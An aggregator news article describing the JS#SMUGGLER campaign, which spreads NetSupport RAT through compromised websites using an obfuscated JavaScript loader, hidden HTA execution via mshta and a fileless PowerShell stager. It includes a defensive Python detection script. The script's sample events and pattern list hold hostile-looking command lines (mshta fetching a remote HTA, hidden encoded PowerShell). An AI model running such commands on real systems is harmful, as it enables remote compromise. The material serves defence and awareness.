

JS#SMUGGLER Campaign Deploys NetSupport RAT via Compromised Websites

Cybersecurity researchers have uncovered a sophisticated campaign named JS#SMUGGLER that leverages compromised websites to distribute the NetSupport RAT (Remote Access Trojan). This multi-stage attack grants cybercriminals extensive control...

Experts Confirm JS#SMUGGLER Uses Compromised Sites to Deploy NetSupport RAT

Image via The Hacker News

Key Insights

  • JS#SMUGGLER uses compromised websites to spread NetSupport RAT.
  • The attack involves a three-stage process: obfuscated JavaScript loader, hidden HTA execution, and PowerShell payload delivery.
  • NetSupport RAT allows attackers to remotely control desktops, steal data, and execute commands.
  • The campaign employs multiple layers of obfuscation and evasion techniques to avoid detection.
  • Why this matters: This campaign demonstrates the increasing sophistication of web-based malware attacks and the need for enhanced security measures to protect against remote access threats.

In-Depth Analysis

The JS#SMUGGLER campaign is a complex, multi-stage web-based malware operation. Here's a breakdown:

1. **Compromised Websites:** Attackers inject a heavily obfuscated JavaScript loader ("phone.js") into compromised websites. This loader is retrieved from attacker-controlled domains.
2. **Device Profiling:** The JavaScript loader profiles the device visiting the website. Mobile users are redirected to a full-screen iframe, while desktop users trigger a remote script injection.
3. **Hidden HTA Execution:** A malicious HTML Application (HTA) is executed silently using "mshta.exe," a legitimate Windows component. This HTA deploys a fileless PowerShell stager.
4. **PowerShell Payload:** The PowerShell stager decrypts and executes a payload in memory, avoiding detection. This payload retrieves and deploys NetSupport RAT.
5. **NetSupport RAT Deployment:** NetSupport RAT is installed, granting attackers complete remote control over the compromised host. The malware achieves persistence by creating a disguised shortcut in the Windows Startup folder.

This campaign uses multiple evasion techniques, including obfuscation, encryption, and fileless execution, to bypass traditional security measures. The attackers also employ a tracking mechanism to ensure the malicious logic is fired only once per visit, minimizing the chances of detection.


FAQ

What is JS#SMUGGLER?

JS#SMUGGLER is a sophisticated, multi-stage web-based malware campaign that uses compromised websites to distribute the NetSupport RAT.

What is NetSupport RAT?

NetSupport RAT (Remote Access Trojan) is the name given to the legitimate NetSupport remote administration tool when it is deployed maliciously to gain unauthorized access to, and control over, victim systems.

How can I protect myself from this type of attack?

Validate all software downloads carefully, strengthen your endpoint defenses to detect suspicious script activity, enforce strict script execution policies, enable PowerShell logging, and monitor Startup folder changes.
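The attack chain in the analysis above (mshta.exe launching a hidden PowerShell stager, then a shortcut dropped into the Startup folder) and the advice here to enable PowerShell logging and watch the Startup folder both point at the same two detections. The following is an added example, not code from the article or from The Hacker News write-up, that runs those two checks over a handful of constructed process-creation and file-creation events. The event schema (`type`, `image`, `parent_image`, `cmdline`, `target`) is a simplified hypothetical one modelled loosely on Sysmon Event ID 1 and 11 fields, and every path and command line in the sample data is made up for illustration.

```python
"""Toy detection pass over constructed Windows process/file event records.

Flags two behaviours from the JS#SMUGGLER attack chain, from the defender's side:
  1. mshta.exe spawning a PowerShell child (the hidden HTA -> fileless stager step), and
  2. a shortcut (.lnk) being written into a user's Startup folder (the persistence step).
The events below are constructed for this example; the field names are a
simplified, hypothetical schema in the spirit of Sysmon Event ID 1 / 11.
"""
import re
from dataclasses import dataclass

# Matches "...\Microsoft\Windows\Start Menu\Programs\Startup\<name>.lnk"
STARTUP_LNK_RE = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$",
    re.IGNORECASE,
)

# PowerShell switches that are rarely used by legitimate interactive sessions.
SUSPICIOUS_FLAGS = ("-w hidden", "-enc", "-ep bypass")

# Constructed sample events (not real telemetry). One dict per event.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "mshta.exe https://example.invalid/loader.hta"},
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc AAAA"},
    {"type": "file",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk"},
    # Benign noise: scheduled backup script and an ordinary document write.
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"type": "file", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\alice\Documents\notes.txt"},
]


@dataclass
class Finding:
    rule: str
    detail: str


def basename(path):
    """Lower-cased final path component, so image comparisons are case-insensitive."""
    return path.rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """Flag PowerShell whose parent is mshta.exe, noting any evasive switches."""
    if basename(ev["image"]) not in ("powershell.exe", "pwsh.exe"):
        return None
    if basename(ev["parent_image"]) != "mshta.exe":
        return None
    cl = ev["cmdline"].lower()
    flags = [f for f in SUSPICIOUS_FLAGS if f in cl]
    return Finding("mshta_spawns_powershell",
                   f"{ev['cmdline']} (flags: {', '.join(flags) or 'none'})")


def check_file(ev):
    """Flag any .lnk written into a Startup folder and record which process wrote it."""
    if not STARTUP_LNK_RE.search(ev["target"]):
        return None
    return Finding("startup_lnk_written",
                   f"{basename(ev['image'])} wrote {ev['target']}")


def scan(events):
    """Run the matching check for each event and return the list of findings."""
    findings = []
    for ev in events:
        f = check_process(ev) if ev["type"] == "process" else check_file(ev)
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.detail}")
```

Run as a script it prints one line per finding: the mshta-parented PowerShell launch with its hidden/encoded switches, and the shortcut written into alice's Startup folder; the two benign events produce nothing. In a real deployment the same two rules map directly onto a Sysmon or EDR query, with the Startup-folder rule tuned to alert on the writing process rather than on every .lnk.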

Takeaways

  • The JS#SMUGGLER campaign highlights the importance of being cautious when visiting websites, as even legitimate sites can be compromised.
  • Organizations and individuals should implement robust security measures, including endpoint detection and response (EDR) solutions, to detect and prevent such attacks.
  • Regular security audits and employee training can help reduce the risk of falling victim to web-based malware campaigns.

Discussion

Do you think these types of attacks will become more common? What security measures do you have in place to protect against them? Share this article with others who need to stay ahead of this trend!


Disclaimer

This article was compiled by Yanuki using publicly available data and trending information. The content may summarize or reference third-party sources that have not been independently verified. While we aim to provide timely and accurate insights, the information presented may be incomplete or outdated.

All content is provided for general informational purposes only and does not constitute financial, legal, or professional advice. Yanuki makes no representations or warranties regarding the reliability or completeness of the information.

This article may include links to external sources for further context. These links are provided for convenience only and do not imply endorsement.

Always do your own research (DYOR) before making any decisions based on the information presented.